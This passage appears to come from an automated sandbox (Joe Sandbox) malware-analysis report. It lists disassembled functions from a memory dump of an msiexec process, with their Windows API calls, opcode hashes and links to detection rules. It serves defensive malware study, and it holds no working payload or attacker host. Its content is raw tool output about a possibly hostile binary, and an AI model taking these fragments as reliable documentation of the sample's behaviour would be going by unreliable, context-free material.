                                                                                                        • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                        • String ID:
                                                                                                        • API String ID: 2154303073-0
                                                                                                        • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                        • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                        • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                        • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                        Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3150196962-0
                                                                                                        • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                        • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                        • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                        • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                        Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$PointerRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 3154509469-0
                                                                                                        • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                        • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                        • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                        • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                        Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                          • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                          • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                          • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 4232544981-0
                                                                                                        • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                        • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                        • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                        • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                        Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID:
                                                                                                        • API String ID: 3664257935-0
                                                                                                        • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                        • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                        • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                        • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                        Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                          • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                        • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$FileModuleName
                                                                                                        • String ID:
                                                                                                        • API String ID: 3859505661-0
                                                                                                        • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                        • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                        • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                        • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                        Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 2738559852-0
                                                                                                        • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                        • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                        • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                        • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                        Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3934441357-0
                                                                                                        • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                        • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                        • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                        • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                        Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID:
                                                                                                        • API String ID: 3664257935-0
                                                                                                        • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                        • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                        • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                        • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                        Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                        • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                        • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                        • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                        Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                        • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                        • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                        • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                        Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 613200358-0
                                                                                                        • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                        • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                        • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                        • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                        Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID:
                                                                                                        • API String ID: 3664257935-0
                                                                                                        • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                        • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                        • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                        • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                        Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnumNamesResource
                                                                                                        • String ID:
                                                                                                        • API String ID: 3334572018-0
                                                                                                        • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                        • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                        • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                        • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                        Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID:
                                                                                                        • API String ID: 3664257935-0
                                                                                                        • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                        • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                        • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                        • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                        Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseFind
                                                                                                        • String ID:
                                                                                                        • API String ID: 1863332320-0
                                                                                                        • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                        • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                        • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                        • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                        Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 3188754299-0
                                                                                                        • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                        • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                        • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                        • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                        Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                        • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                        • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                        • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                        Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004095FC
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                          • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                          • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                          • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3655998216-0
                                                                                                        • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                        • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                        • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                        • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                        Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00445426
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                          • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 1828521557-0
                                                                                                        • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                        • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                        • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                        • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                        Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                          • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                        • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ??2@FilePointermemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 609303285-0
                                                                                                        • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                                        • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                        • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                                                                                                        • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                        Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcsicmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 2081463915-0
                                                                                                        • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                        • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                        • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                                        • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                        Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
